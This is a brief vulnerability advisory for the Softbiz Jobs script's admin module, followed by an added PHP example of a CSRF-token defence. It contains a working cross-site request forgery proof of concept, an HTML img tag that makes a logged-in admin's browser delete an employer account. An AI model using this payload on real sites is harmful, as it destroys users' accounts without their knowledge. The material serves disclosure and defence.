=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in - Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts
# Proof of concept
Script to delete the registered user through Cross Site request forgery
...................................................................................................................
<html>
<body>
<img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID]/>
</body>
</html>
...................................................................................................................
After execution, refresh the page and you can see that the user having id=20 gets deleted automatically.
# If you have any questions, comments, or concerns, feel free to contact me.
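The fix for the behaviour shown above is to refuse state changes over GET and to require a per-session token that a cross-site page cannot read. The following is an added example, not Softbiz code and not part of the original advisory; the function names `csrf_token` and `may_delete_employer`, the `csrf_token` field name and the sample requests are assumptions made for illustration.

```php
<?php
// Added example (hypothetical helper names); not the vendor's delete_employer.php.

// Issue one random token per admin session; embed it in every admin form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a delete request may proceed. Returns [allowed, reason].
function may_delete_employer(string $method, array $post, array $session): array
{
    // GET must never change state: an <img> tag can only issue a GET.
    if ($method !== 'POST') {
        return [false, 'state change requires POST'];
    }
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // hash_equals compares in constant time; reject empty or non-string input first.
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        return [false, 'missing or wrong CSRF token'];
    }
    $id = $post['id'] ?? null;
    if (!is_string($id) || !ctype_digit($id)) {
        return [false, 'invalid id'];
    }
    return [true, 'ok'];
}

// Constructed sample requests: [method, POST body].
$session = [];
$token = csrf_token($session);
$cases = [
    'cross-site image GET'  => ['GET',  []],
    'cross-site POST'       => ['POST', ['id' => '20']],
    'POST with wrong token' => ['POST', ['id' => '20', 'csrf_token' => 'guess']],
    'genuine admin form'    => ['POST', ['id' => '20', 'csrf_token' => $token]],
];
foreach ($cases as $name => [$method, $post]) {
    [$ok, $why] = may_delete_employer($method, $post, $session);
    printf("%-22s => %s (%s)\n", $name, $ok ? 'ALLOW' : 'DENY', $why);
}
```

In a real handler, `$session` would be `$_SESSION`, `$method` would be `$_SERVER['REQUEST_METHOD']` and `$post` would be `$_POST`, with the check run before any database call.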